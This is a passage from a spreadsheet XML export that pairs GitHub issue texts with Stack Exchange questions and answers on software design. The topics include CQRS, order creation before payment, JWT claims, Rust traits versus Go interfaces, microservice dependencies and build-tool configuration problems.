Ultimately, in any architecture you choose, there is going to be some component or layer that has most of the business logic. After all, if business logic is scattered all over the place then you just have spaghetti code. But whether or not you call that component a *service*, and how it's designed in terms of things like number or size of operations, depends on your architectural goals.
There's no right or wrong answer, only what applies to your situation.
  [1]: http://www.codinghorror.com/blog/2006/03/i-shall-call-it-somethingmanager.html
  [2]: http://en.wikipedia.org/wiki/Anemic_domain_model
  [3]: http://vimeo.com/43598193
  [4]: http://en.wikipedia.org/wiki/Single_responsibility_principle
  [5]: http://gorodinski.com/blog/2012/04/14/services-in-domain-driven-design-ddd/
  [6]: http://martinfowler.com/eaaCatalog/transactionScript.html</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to get on to latest Kotlin version 2.1.0 for my old project that has Build.gradle. So I follow &lt;a href="https://developer.android.com/develop/ui/compose/compiler" rel="nofollow noreferrer"&gt;https://developer.android.com/develop/ui/compose/compiler&lt;/a&gt; by adding Compose Compiler Gradle plugin.&lt;/p&gt;
&lt;p&gt;In my project's build.gradle, I have&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;buildscript {
    apply from: 'dependencies.gradle'
    repositories {
        google()
        mavenCentral()
        maven {
            url &amp;quot;https://plugins.gradle.org/m2/&amp;quot;
        }
    }
    dependencies {
        classpath &amp;quot;com.android.tools.build:gradle:8.5.2&amp;quot;
        classpath &amp;quot;org.jetbrains.kotlin:kotlin-gradle-plugin:2.1.0&amp;quot;
        classpath .... 
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In my app module's build.gradle, I have&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;apply plugin: 'com.android.application'
apply plugin: 'kotlin-android'
apply plugin: 'org.jetbrains.kotlin.plugin.compose' // Newly added
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;FYI, I have also tried the latest syntax&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;plugins {
    id(&amp;quot;com.android.application&amp;quot;)
    id(&amp;quot;kotlin-android&amp;quot;)
    id(&amp;quot;org.jetbrains.kotlin.plugin.compose&amp;quot;)
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I try to sync, it complains&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;A problem occurred evaluating project ':App'.
&amp;gt; Plugin with id 'org.jetbrains.kotlin.plugin.compose' not found.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What did I miss?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C894</t>
  </si>
  <si>
    <t>Feature request
Throwing exception vs returning error from the business layer is subject to debate, but returning an error from the business layer seems more meaningful ( Honestly, this is a personal belief)
https://softwareengineering.stackexchange.com/questions/405038/result-object-vs-throwing-exceptions</t>
  </si>
  <si>
    <t>You have to distinguish between return values and errors.
A return value is one of many possible outcomes of a computation. An error is an unexpected situation which needs to be reported to the caller.
A module
may
indicate that an error occurred with a special return value or it throws an exception because an error was not expected. That errors occur should be an
exception
, that's why we call them exceptions.
If a module validates lottery tickets, the outcome may be:
you have won
you have not won
an error occurred (e.g. the ticket is invalid)
In case of an error, the return value is neither "won" nor "not won", since no meaningful statement can be made when e.g. the lottery ticket is not valid.
Addendum
One might argue that invalid tickets are a common case and not an error. Then the outcome of the ticket validation will be:
you have won
you have not won
the ticket is invalid
an error occurred (e.g. no connection to the lottery server)
It all depends on what cases you are planning to support and what are unexpected situations where you do not implement logic other than to report an error.</t>
  </si>
  <si>
    <t xml:space="preserve">I have a web app built on Java Servlet technology. I am thinking of switching to a new framework, possibly switching over to a .NET stack with C# and ASP MVC. I don't want to take the current app down while I develop the new one. The goal is to have the old system run and just develop new modules in a new architecture. 
If I stay with a Java stack I think it is simply a matter of servlet mapping. However, If I switch to a .NET stack I will have to transfer sessions between the two systems. Is this doable in an easy way? Would I have to use something like SOAP? 
Does anyone have any experience doing something like this?
Thanks
</t>
  </si>
  <si>
    <t>C895</t>
  </si>
  <si>
    <t>moved some interfaces to their rigghtful design pattern folder. thank
s to this post http://softwareengineering.stackexchange.com/questions/302808/cqrs-and-ddd-terminology. Really cleared up some ambiguities between whhich components fit where (CQRS, DDD, ES)</t>
  </si>
  <si>
    <t>CQRS and DDD are separate/orthogonal concepts, and I think you divided the terms pretty close to right.
Events under
DDD
are called Domain Events, and are somewhat different from the Messaging events often mentioned with CQRS. Messaging events usually have more to do with
Event Sourcing
.
Your CQRS category is a conglomeration of
a number of patterns
, and only one of those (Read model / Write model) is actually definitional to CQRS.
Messaging
, implemented as commands and events. Messaging gives you a lot of flexibility over something like, say RPC. Messages, being just request or event data, can be examined, prioritized, queued, partitioned across nodes, forwarded, retried, subscribed to, etc. Conversely, they can also be lost, poisoned, etc.
Saga
and
Process Manager
are
often used interchangeably
when referring to a Process Manager. Both are strategies for avoiding distributed transactions, usually in order to maintain scalability.
Projection
goes way back. You probably know this most commonly from SQL. The
SELECT expr [as name]
statement is the Projection operation in
relational algebra
, on which SQL is based. A projection is just a subset or transformation of the underlying data.
In the context of CQRS, projections are usually referring to views (aka read models). Although technically an event-sourced aggregate is also a projection -- it's an event stream transformed into a structured model, just like with views.
Separating
read and write models
is the
essential definition of CQRS
. CQRS is helpful because the data you need for views (reads) is different from what is needed for writes. In a traditional 3-layer system (presentation, business, data layers), you often naively start with the same class being used by all 3 layers. As complexity increases, you will end up with extra fields which are used by only one layer, but add mental weight at all layers. "I just added something to this collection. Do I need to update the DisplayCount here or will the view do that? Do I need to persist this DisplayCount or does the view recalculate that each time? Wait, why is DisplayCount a string?!"
You start to realize that read and write needs are different enough to warrant different objects to isolate concerns. That can lead to mapping business object to a view object, which is arguably a form of CQRS. (This also happens in DDD systems not using CQRS, mapping from domain model to view). However when claiming CQRS, people often mean they are persisting both read and write models, not loading the write model and mapping it to a read model. There are typically multiple read models for a given write model to accommodate the specific needs of different ui screens/reports/views.
Eventual consistency
is not unique to CQRS either. Any time you create a report that gets run periodically, you have created an eventually-consistent read model. When it is talked about with CQRS, it usually means that most/all read models are eventually consistent. This is optional to CQRS. You could use CQRS in a fully consistent manner, and this would simply shift the IO burden from reads to writes. This by itself is probably an okay trade-off for most system, because IO is likely dominated by reads.
Systems with a single model of data are optimized for writing (
normalized
) and reads are expensive (i.e. JOINs in SQL). With CQRS, you trade towards cheap reads by making separate (and probably multiple) read models which are
de
normalized (all necessary data put into each read model so no JOINs are needed). In a fully consistent system, you have to update the write model and all read models at the same time to maintain read/write consistency. You are trading write performance for read performance.
Enter eventual consistency, which buys you cheap reads and writes, with the trade-off that read models will be slightly behind (eventually consistent with) the write model. This is due to an out-of-band process (often called a denormalizer) updating the read models after-the-fact.
Many people have developed "CQRS systems" which are combinations of these patterns plus CQRS. However, the CQRS pattern really only amounts to separating read and write models. It doesn't mean you have eventual consistency, event sourcing, process managers, messaging, or anything else. However, the mentioned patterns do synergize well with CQRS and are basically progressive optimizations to take further advantage of it.
Also, CQRS is based on another pattern,
Command-Query Separation
, but takes it a step further.
Edit: For a more detailed explanation on the difference between Domain Events and Events used for event sourcing, please see
this classic Greg Young post
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In python, I can use huggingface dataset like;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dataset = load_dataset(&amp;quot;mlabonne/FineTome-100k&amp;quot;, split='train')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The question is, I'd like to get the dataset's statistics like no. of columns, it's distribution, etc. like HuggingFace Dataset Viewer?&lt;/p&gt;
&lt;p&gt;I googled it but not helped. Can you please suggest any methods with pandas/numpy or 3rd party libraries?&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/ABAJAZ8J.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/ABAJAZ8J.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C896</t>
  </si>
  <si>
    <t>remove user email from session
eature request
Email is personally identifiable information and sensitive information, so exposing it is a security concern.
Currently, user email is provided in both the user and session responses from signIn and other methods:
const { user, session, error } = await supabase.auth.signIn({
  email: 'example@email.com',
  password: 'example-password',
})
Specifically, email is within session.access_token.
This isn't necessary because we already have email within the user object.
Describe the solution you'd like
The system should use User UID in the session instead.
Describe alternatives you've considered
Supabase could support secret salting for the jwt and/or specifically salting the email within the jwt.
Supabase could support custom application jwts (I would really like this actually, but in addition to not instead of the current request)
Additional context
StackExchange on why unencrypted emails are insecure:
https://softwareengineering.stackexchange.com/a/408592/395521
I know that some applications are fine with public emails - but some are not. Supabase should default to the less permissive pattern and applications can send along email by other means if desired.
Github, Twitter, Google - I consider these companies as security models and since Supabase supports social login from these providers it seems to be a shared value. I don't believe any of them have email in a req header or cookie in plain text, jwt, or b64 encoding. If it's there at all, it's obfuscated in a non-standard way.
OTOH, they do make User ID apparent in cookies or other req headers</t>
  </si>
  <si>
    <t>Yes, it is bad practice and a security problem.
Email addresses are PII (personally identifiable information). Like all other PII,
email addresses should never be stored unencrypted at rest; doing so is inherently insecure.
If your JWTs are going to be stored at rest anywhere - such as a database, or local or session storage in the browser - then you should not use any claims in your JWT that expose PII.
The fact that
email
is a registered IANA JWT claim is beside the point - so are
given_name
,
middle_name
,
family_name
,
birthdate
,
phone_number
, and
address
, but that's all PII too.</t>
  </si>
  <si>
    <t xml:space="preserve">I was currently looking at S#arp Architecture. It seems to be still too young to develop anything on top of it.
Is there any alternative to S#arp that include support for NHibernate (fluent a plus), testing and MVC?
</t>
  </si>
  <si>
    <t>C897</t>
  </si>
  <si>
    <t>order and payment creation order
The documentation provided here suggests order creation should be performed after payment is complete.
https://github.com/commercetools/commercetools-adyen-integration/blob/master/extension/docs/WebComponentsIntegrationGuide.md#web-components-integration-guide
Is there any particular reason you suggest that flow?
The common and I believe best practice is to create an order first and then update its status after the payment is complete.
 there are many reasons for the order to be created as a first thing.
We know the payment process is in its nature an asynchronous thing, right?
Consider following scenarios
the payment gateway had a delay in the payment processing,
there was an issue on the webhook side, and there was an error while handling notification about payment completion and the order couldn't be created.
In those scenarios, the customer is left alone, confused, without an error message, without an order, and still with a non-empty cart.
But if we place an order first, the customer will find that order in the orders tab, the order with the status 'awaiting payment'.
According to:
Otherwise we need to update/cancel the order after payment is authorized/rejected, which means extra traffic over the network is required.
Updating, canceling, or changing the state of the order is something natural for the Order model in the context of an e-commerce subdomain. Extra traffic over the network is not an argument at all.
I would reference that discussion here as well https://softwareengineering.stackexchange.com/questions/319658/do-you-create-an-order-before-or-after-payment-on-an-ecommerce-site</t>
  </si>
  <si>
    <t>Yes, create it! You **absolutely** must create the Order (or some other kind of record) before taking payment, not afterward. I have never seen an e-commerce system not do this. Here are just a few reasons why, off the top of my head.
**Very bad edge cases.** The payment could go through on the payment processor's server, but a network problem could prevent the response from reaching your system. If this were to happen, there would be a mysterious debit on the customer's ledger with no record of how it got there or why.
**Matching entries.** You need the OrderID from that record in order to pass into the "Memo" field in the payment transaction. That way you have matching entries in case of dispute. If you haven't generated the Order record yet, you probably don't have that ID.
**Customer support.** If a payment fails, the customer might call to find out why. If you don't have the Order record, that call becomes very awkward, as the customer service rep won't have a clue what the customer is talking about, and reconstructing the order becomes a chore.
**Fault tolerance.** If your payment processor goes down for any reason, you want may want to keep your web site open and allow customers to continue to place orders. With the order records created you will just need to run payment processing offline. In theory this could even be done manually.
**Sale Leads.** If a payment fails, that does not mean the customer no longer wants the product. If you have the Order on record, your application has many more options for helping the customer complete his purchase, e.g. by trying again with a different payment method, by emailing them a month later to see if they can now afford it, etc.
**Business intelligence.** If people are ordering certain products, your marketing folks will want to know which products and how many. This will help them gauge demand, pricing, and product offerings.
**Compliance.** The Order provides an audit trail, which is required by PCI-DSS. You must be able to account for the source of every credit card transaction or you will fail PCI audits possibly lose your merchant status.
What is the down side of creating it first? Oh no, you've got an extra record in the table. Who cares? Set up a job to clean up unfulfilled orders in 90 days; this is incredibly easy, compared to the problems that are solved.
Here is an example of a high level flow that is common:
1. Customer completes order
2. Order record is created
3. Payment is authorized; order record is updated with the authorization code.
4. Shipping order and pick lists are created; warehouse worker attempts to fill order
5. If out of stock, go to alternative flow where you either cancel the order or email the customer.
6. If fully in stock, capture payment using the authorization code created in step 3. Update the order to indicate payment has been captured.
7. Ship</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a pyspark based pipeline that uses spark.read.format(&amp;quot;binaryFile&amp;quot;) to decompress tgz files and handle the pcap file inside (exploding to packages etc).
The code that handles the tar, pcap, and single packets is written as pure python and integrated as &amp;quot;User Defined Function&amp;quot;.&lt;/p&gt;
&lt;p&gt;This pipeline works fine but files that contain a pcap files larger 2GB yield &lt;code&gt;ValueError: can not serialize object larger than 2G&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;is there any way to overcome this?&lt;/p&gt;
&lt;p&gt;I would like to keep&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;self.unzipped: DataFrame = spark.read.format(&amp;quot;binaryFile&amp;quot;)\
    .option(&amp;quot;pathGlobFilter&amp;quot;, &amp;quot;*.pcap.tgz&amp;quot;)\
    .option(&amp;quot;compression&amp;quot;, &amp;quot;gzip&amp;quot;)\
    .load(folder)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Because of the abstraction layer regarding the file source, it works with file://, hadoop:// and other like azure (abfss://) - if you add the dependencies.&lt;/p&gt;
&lt;p&gt;If not possible what are alternatives?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Since this is an error in python serializer - will this work in an Scala or R implementation?&lt;/li&gt;
&lt;li&gt;if uncompressing on driver (with pure python code, and creating the first dataframe from chunks of packages from pcap) - how to read the file in similar way that accepts different protocols as path (i would need file:// and abfss://)&lt;/li&gt;
&lt;li&gt;any other ideas?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Update:&lt;/p&gt;
&lt;p&gt;I am using Pyspark 3.51&lt;/p&gt;
&lt;p&gt;Source that raises the error: &lt;a href="https://github.com/apache/spark/blob/bbb9c2c1878e200d9012d2322d979ae794b1d41d/python/pyspark/serializers.py#L160" rel="nofollow noreferrer"&gt;https://github.com/apache/spark/blob/bbb9c2c1878e200d9012d2322d979ae794b1d41d/python/pyspark/serializers.py#L160&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C898</t>
  </si>
  <si>
    <t>MVP in go guide plan
1 .create a main entry point for mvp binary
1. It will take the following parameters as input
id, the pubkey as identifier
network, the gossip entry point for the client to connect to
file, the storage location for the data
2. It will check the availability for all the parameters which has been passed in
3. A process which will select the leader in gossip pool
4. Create a new instance of client
5. Loop
Check the balance is correct
Loop to request air drop until
6. Loop
Run the handle_role_transition loop
https://softwareengineering.stackexchange.com/questions/247298/how-are-rust-traits-different-from-go-interfaces
https://gobyexample.com/methods</t>
  </si>
  <si>
    <t>What happens in Rust if you define a function that implements a trait but you don't use impl? It just doesn't work?
You need to explicitly implement the trait; happening to have a method with matching name/signature is meaningless for Rust.
Generic call dispatching
Are these the only non-trivial differences? If so, it would appear Go's Interface/Type system is, in practice, not as weak as perceived.
Not providing static dispatch can be a significant performance hit for certain cases (e.g. the
Iterator
one I mention below). I think this is what you mean by
Go really has no response here. This is the only thing that is significantly more powerful and it's ultimately just a replacement for copying and pasting methods with different type signatures.
but I'll cover it in more detail, because it's worth understanding the difference deeply.
In Rust
Rust's approach allows for the user to choose between static dispatch and
dynamic dispatch
. As an example,  if you have
trait Foo { fn bar(&amp;self); }
impl Foo for int { fn bar(&amp;self) {} }
impl Foo for String { fn bar(&amp;self) {} }
fn call_bar&lt;T: Foo&gt;(value: T) { value.bar() }
fn main() {
    call_bar(1i);
    call_bar("foo".to_string());
}
then the two
call_bar
calls above will compile to calls to, respectively,
fn call_bar_int(value: int) { value.bar() }
fn call_bar_string(value: String) { value.bar() }
where those
.bar()
method calls are static function calls, i.e. to a fixed function address in memory. This allows for optimisations like inlining, because the compiler knows
exactly
which function is being called. (This is what C++ does too, sometimes called "monomorphisation".)
In Go
Go only allows dynamic dispatch for "generic" functions, that is, the method address is loaded from the value and then called from there, so the exact function is only known at runtime. Using the example above
type Foo interface { bar() }
func call_bar(value Foo) { value.bar() }
type X int;
type Y string;
func (X) bar() {}
func (Y) bar() {}
func main() {
    call_bar(X(1))
    call_bar(Y("foo"))
}
Now, those two
call_bar
s will always be calling the above
call_bar
, with the address of
bar
loaded from the interface's
vtable
.
Low-level
To rephrase the above, in C notation. Rust's version creates
/* "implementing" the trait */
void bar_int(...) { ... }
void bar_string(...) { ... }
/* the monomorphised `call_bar` function */
void call_bar_int(int value) {
    bar_int(value);
}
void call_bar_string(string value) {
    bar_string(value);
}
int main() {
    call_bar_int(1);
    call_bar_string("foo");
    // pretend that is the (hypothetical) `string` type, not a `char*`
    return 1;
}
For Go, it's something more like:
/* implementing the interface */
void bar_int(...) { ... }
void bar_string(...) { ... }
// the Foo interface type
struct Foo {
    void* data;
    struct FooVTable* vtable;
}
struct FooVTable {
    void (*bar)(void*);
}
void call_bar(struct Foo value) {
    value.vtable.bar(value.data);
}
static struct FooVTable int_vtable = { bar_int };
static struct FooVTable string_vtable = { bar_string };
int main() {
    int* i = malloc(sizeof *i);
    *i = 1;
    struct Foo int_data = { i, &amp;int_vtable };
    call_bar(int_data);
    string* s = malloc(sizeof *s);
    *s = "foo"; // again, pretend the types work
    struct Foo string_data = { s, &amp;string_vtable };
    call_bar(string_data);
}
(This isn't exactly right---there has to be more information in the vtable---but the method call being a dynamic function pointer is the relevant thing here.)
Rust offers the choice
Going back to
Rust's approach allows for the user to choose between static dispatch and dynamic dispatch.
So far I've only demonstrated Rust having statically dispatched generics, but Rust can opt-in to the dynamic ones like Go (with essentially the same implementation), via trait objects. Notated like
&amp;Foo
, which is a borrowed reference to an unknown type that implements the
Foo
trait. These values have the same/very similar vtable representation to the Go interface object. (A trait object is an example of an
"existential type"
.)
There are instances where dynamic dispatch is really helpful (and sometimes more performant, by, e.g. reducing code bloat/duplication), but static dispatch allows compilers to inline the callsites and apply all their optimisations, meaning it is normally faster. This is especially important for things like
Rust's iteration protocol
, where static dispatching trait method calls allows for those iterators to be as fast as the C equivalents, while still
seeming high-level and expressive
.
Tl;dr: Rust's approach offers both static and dynamic dispatch in generics, at the programmers discretion; Go only allows for dynamic dispatch.
Parametric polymorphism
Furthermore, emphasising traits and deemphasising reflection gives Rust much stronger
parametric polymorphism
: the programmer knows exactly what a function can do with its arguments, because it has to declare the traits the generic types implement in the function signature.
Go's approach is very flexible, but has fewer guarantees for the callers (making it somewhat harder for the programmer to reason about), because the internals of a function can (and do) query for additional type information (there was a bug in the Go standard library where, iirc, a function taking a writer would use reflection to call
Flush
on some inputs, but not others).
Building abstractions
This is somewhat of a sore point, so I'll only talk briefly, but having "proper" generics like Rust has allows for low level data types like Go's
map
and
[]
to actually be implemented directly in the standard library in a strongly typesafe way, and written in Rust (
HashMap
and
Vec
respectively).
And its not just those types, you can build type-safe generic structures on top of them, e.g.
LruCache
is a generic caching layer on top of a hashmap. This means people can just use the data structures directly from the standard library,
without
having to store data as
interface{}
and use type assertions when inserting/extracting. That is, if you have an
LruCache&lt;int, String&gt;
, you're guaranteed that the keys are always
int
s and the values are always
String
s: there's no way to accidentally insert the wrong value (or try to extract a non-
String
).</t>
  </si>
  <si>
    <t xml:space="preserve">I'm building my first web application after many years of desktop application development (I'm using Django/Python but maybe this is a completely generic question, I'm not sure). So please beware - this may be an ultra-newbie question...  
One of my user processes involves heavy processing in the server (i.e. user inputs something, server needs ~10 minutes to process it). On a desktop application, what I would do it throw the user input into a queue protected by a mutex, and have a dedicated background thread running in low priority blocking on the queue using that mutex.
However in the web application everything seems to be oriented towards synchronization with the HTTP requests.
Assuming I will use the database as my queue, what is best practice architecture for running a background process?
</t>
  </si>
  <si>
    <t>C899</t>
  </si>
  <si>
    <t>Highlight bidirectional dependencies #35
https://softwareengineering.stackexchange.com/questions/398453/cyclic-dependencies-in-microservices</t>
  </si>
  <si>
    <t>Let's first get rid of a misconception
The
microservice architecture
"
structures the application as a set of loosely coupled, collaborating services
":
Collaborating
mean that microservices may need to work together to achieve a higher objective. They may therefore need to know (or find out) how to work with other microservices, and perhaps even to rely on them.
Loosely coupled
means that each microservice is well encapsulated and can be replaced by another microservice offering the same "contract", the same external interface.
The goal of this architecture is allow you to compose many simpler microservices in order to offer complex services that can be scaled. Achieving this goal does not mean that microservices are independent, but that they are that are
independently deployable
. And that's a big difference
Your question in theory
If a microservice A depends on a microservice B you must be able to deploy a new version of A without touching B. So the services are dependent but they can be independently deployed.  As a real-life example, look at the relation between authorisation and product microservices
in the Netflix stack
.
If there is a cycle however, one should analyse if the service decomposition did went to far:
If microservice A depends on B, but at the same time B depends on A,  it starts to look very much like a strong coupling. This means that something did not work as it should.  Verify if both functionality should not be packaged as a single microservice.
If a microservice A depends on a microservice B, which depends on microservice C which depends on microservice A, it's less obvious, but the service decomposition should be challenged for the same reason.
Note that the dependency can very well be indirect (e.g. via a message queue)
Your question in practice
Let's look at the rule: "
forbid our users buying more than 10 bananas total
":
the rule is a condition for accepting the order, so it needs to be checked as part of
Order Service
to verify the rule, you need to find all past orders of the customer (in a given time frame?) and aggregate the quantity by product.  This would therefore typically be implemented as part of
Order Service
so for your question, there is no need for questions: everything would be performed as part of one microservice.
But you could imagine less trivial scenarios:
Order Service
could need to look for stock availability to inform the user of out-of-stock items during the ordering process.  Either you'd make sure that all stock events are forwarded to order service.  Or you would make
Order Service
addressing a request to
Stock Service
.
In B2B, it would not be uncommon that
Order Service
needs to do a credit check for accepting an order, since the customer would pay after having received the goods.
Credit management
usually combines information from lot of sources  (e.g. external credit rating agencies, outstanding orders, outstanding invoices, payment history, etc...).  It would be a good candidate for a microservice.  But credit management requires to get invoices from accounting, which might receive them from order management.   So a circular dependency is something that can happen.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are lots of answered questions on SO, but I still can't get this to work. I have a multi module Maven project. I followed &lt;a href="https://www.baeldung.com/maven-jacoco-multi-module-project" rel="nofollow noreferrer"&gt;https://www.baeldung.com/maven-jacoco-multi-module-project&lt;/a&gt; to set up JaCoCo. I have a &lt;code&gt;report-aggregate/target/site&lt;/code&gt; directory, and &lt;code&gt;jacoco-aggregate/index.html&lt;/code&gt; shows 100% coverage.&lt;/p&gt;
&lt;p&gt;When I run &lt;code&gt;mvn install sonar:sonar&lt;/code&gt; I get a warning for each submodule&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;No coverage report can be found with
sonar.coverage.jacoco.xmlReportPaths='C:\Users\me\IdeaProjects\test\sub2/target/site/jacoco-aggregate/jacoco.xml'.
Using default locations:
target/site/jacoco/jacoco.xml,target/site/jacoco-it/jacoco.xml,build/reports/jacoco/test/jacocoTestReport.xml&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That is for sub2, sub1 and the main module, in that order, and with &lt;code&gt;sonar.coverage.jacoco.xmlReportPaths&lt;/code&gt; set to &lt;code&gt;${project.basedir}/target/site/jacoco-aggregate/jacoco.xml&lt;/code&gt;. On http://mysonarqube:9000 it says &amp;quot;Coverage not computed&amp;quot;.&lt;/p&gt;
&lt;p&gt;When I change &lt;code&gt;sonar.coverage.jacoco.xmlReportPaths&lt;/code&gt; to &lt;code&gt;${project.basedir}/report-aggregate/target/site/jacoco-aggregate/jacoco.xml&lt;/code&gt; I get the same warnings for sub2, sub1 and report-aggregate, because &lt;code&gt;C:\Users\me\IdeaProjects\test\report-aggregate/report-aggregate/target/site/jacoco-aggregate/jacoco.xml&lt;/code&gt; can't be found.&lt;/p&gt;
&lt;p&gt;The Maven output does say in both cases&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Importing 1 report(s). Turn your logs in debug mode in order to see
the exhaustive list.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;code&gt;mvn install sonar:sonar -X&lt;/code&gt; shows that the report xml is found, and at a late point&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;[DEBUG] 'Generic Coverage Report' skipped because of missing
configuration requirements.&lt;br /&gt;
Accessed configuration:&lt;br /&gt;
- sonar.coverageReportPaths: &amp;lt;empty&amp;gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I tried setting &lt;code&gt;sonar.coverageReportPaths&lt;/code&gt; to the same value as &lt;code&gt;sonar.coverage.jacoco.xmlReportPaths&lt;/code&gt;, but it only led to an exception because the xml format is different.&lt;/p&gt;
&lt;p&gt;&lt;strike&gt;These lines are also always in the output:&lt;/strike&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strike&gt;[WARNING] Missing blame information for the following files:&lt;/strike&gt;&lt;br /&gt;
&lt;strike&gt;[WARNING] * pom.xml&lt;/strike&gt;&lt;br /&gt;
&lt;strike&gt;[WARNING] This may lead to missing/broken features in SonarQube&lt;/strike&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strike&gt;The documentation says it's related to fancy git states. For this test project I'm on the master branch with an initial commit only.&lt;/strike&gt;
Edit: pom.xml was simply not committed.&lt;/p&gt;
&lt;p&gt;How can I have my project with the report-aggregate analysed with SonarQube, including the code coverage? Thanks in advance.&lt;/p&gt;
&lt;p&gt;This is my pom.xml:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;
&amp;lt;project xmlns=&amp;quot;http://maven.apache.org/POM/4.0.0&amp;quot;
         xmlns:xsi=&amp;quot;http://www.w3.org/2001/XMLSchema-instance&amp;quot;
         xsi:schemaLocation=&amp;quot;http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd&amp;quot;&amp;gt;
    &amp;lt;modelVersion&amp;gt;4.0.0&amp;lt;/modelVersion&amp;gt;
    &amp;lt;groupId&amp;gt;me.test&amp;lt;/groupId&amp;gt;
    &amp;lt;artifactId&amp;gt;test&amp;lt;/artifactId&amp;gt;
    &amp;lt;version&amp;gt;1.0-SNAPSHOT&amp;lt;/version&amp;gt;
    &amp;lt;packaging&amp;gt;pom&amp;lt;/packaging&amp;gt;
    &amp;lt;modules&amp;gt;
        &amp;lt;module&amp;gt;sub1&amp;lt;/module&amp;gt;
        &amp;lt;module&amp;gt;sub2&amp;lt;/module&amp;gt;
        &amp;lt;module&amp;gt;report-aggregate&amp;lt;/module&amp;gt;
    &amp;lt;/modules&amp;gt;
    &amp;lt;properties&amp;gt;
        &amp;lt;maven.compiler.source&amp;gt;17&amp;lt;/maven.compiler.source&amp;gt;
        &amp;lt;maven.compiler.target&amp;gt;17&amp;lt;/maven.compiler.target&amp;gt;
        &amp;lt;project.build.sourceEncoding&amp;gt;UTF-8&amp;lt;/project.build.sourceEncoding&amp;gt;
        &amp;lt;sonar.plugin.version&amp;gt;5.0.0.4389&amp;lt;/sonar.plugin.version&amp;gt;
        &amp;lt;sonar.projectKey&amp;gt;test&amp;lt;/sonar.projectKey&amp;gt;
        &amp;lt;sonar.projectName&amp;gt;test&amp;lt;/sonar.projectName&amp;gt;
        &amp;lt;sonar.qualitygate.wait&amp;gt;true&amp;lt;/sonar.qualitygate.wait&amp;gt;
        &amp;lt;sonar.java.coveragePlugin&amp;gt;jacoco&amp;lt;/sonar.java.coveragePlugin&amp;gt;
        &amp;lt;sonar.dynamicAnalysis&amp;gt;reuseReports&amp;lt;/sonar.dynamicAnalysis&amp;gt;
        &amp;lt;sonar.host.url&amp;gt;http://mysonarqube:9000&amp;lt;/sonar.host.url&amp;gt;
        &amp;lt;sonar.token&amp;gt;***&amp;lt;/sonar.token&amp;gt;
        &amp;lt;sonar.coverage.jacoco.xmlReportPaths&amp;gt;
            ${project.basedir}/target/site/jacoco-aggregate/jacoco.xml
        &amp;lt;/sonar.coverage.jacoco.xmlReportPaths&amp;gt;
        &amp;lt;sonar.language&amp;gt;java&amp;lt;/sonar.language&amp;gt;
    &amp;lt;/properties&amp;gt;
    &amp;lt;dependencyManagement&amp;gt;
        &amp;lt;dependencies&amp;gt;
            &amp;lt;dependency&amp;gt;
                &amp;lt;groupId&amp;gt;org.junit.jupiter&amp;lt;/groupId&amp;gt;
                &amp;lt;artifactId&amp;gt;junit-jupiter&amp;lt;/artifactId&amp;gt;
                &amp;lt;version&amp;gt;5.11.3&amp;lt;/version&amp;gt;
                &amp;lt;scope&amp;gt;test&amp;lt;/scope&amp;gt;
            &amp;lt;/dependency&amp;gt;
        &amp;lt;/dependencies&amp;gt;
    &amp;lt;/dependencyManagement&amp;gt;
    &amp;lt;build&amp;gt;
        &amp;lt;plugins&amp;gt;
            &amp;lt;plugin&amp;gt;
                &amp;lt;groupId&amp;gt;org.jacoco&amp;lt;/groupId&amp;gt;
                &amp;lt;artifactId&amp;gt;jacoco-maven-plugin&amp;lt;/artifactId&amp;gt;
                &amp;lt;version&amp;gt;0.8.11&amp;lt;/version&amp;gt;
                &amp;lt;executions&amp;gt;
                    &amp;lt;execution&amp;gt;
                        &amp;lt;goals&amp;gt;
                            &amp;lt;goal&amp;gt;prepare-agent&amp;lt;/goal&amp;gt;
                        &amp;lt;/goals&amp;gt;
                    &amp;lt;/execution&amp;gt;
                &amp;lt;/executions&amp;gt;
            &amp;lt;/plugin&amp;gt;
        &amp;lt;/plugins&amp;gt;
        &amp;lt;pluginManagement&amp;gt;
            &amp;lt;plugins&amp;gt;
                &amp;lt;plugin&amp;gt;
                    &amp;lt;groupId&amp;gt;org.sonarsource.scanner.maven&amp;lt;/groupId&amp;gt;
                    &amp;lt;artifactId&amp;gt;sonar-maven-plugin&amp;lt;/artifactId&amp;gt;
